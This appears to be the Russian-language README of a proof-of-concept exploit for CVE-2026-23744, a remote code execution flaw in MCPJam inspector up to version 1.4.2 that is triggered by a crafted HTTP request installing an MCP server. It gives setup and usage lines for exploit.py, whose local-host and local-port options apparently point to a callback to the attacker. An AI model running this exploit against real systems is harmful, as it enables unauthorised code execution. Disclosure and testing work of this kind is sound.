
CVE-2026-23744 Доказательство концепции.
MCPJam inspector — это локальная платформа для разработки MCP-серверов. Версии <=1.4.2 уязвимы для удалённого выполнения кода (RCE), что позволяет злоумышленнику отправить специально созданный HTTP-запрос, вызывающий установку MCP-сервера и приводящий к RCE. Подробности об уязвимости см. в ссылках.
$ pip install requests
$ python3 exploit.py [-h] [--lhost LHOST] [--lport LPORT] [--rhost RHOST] [--rport RPORT]
-h, --help show the help message and exit
--lhost LHOST local host IP
--lport LPORT local host port
--rhost RHOST remote IP
--rport RPORT remote port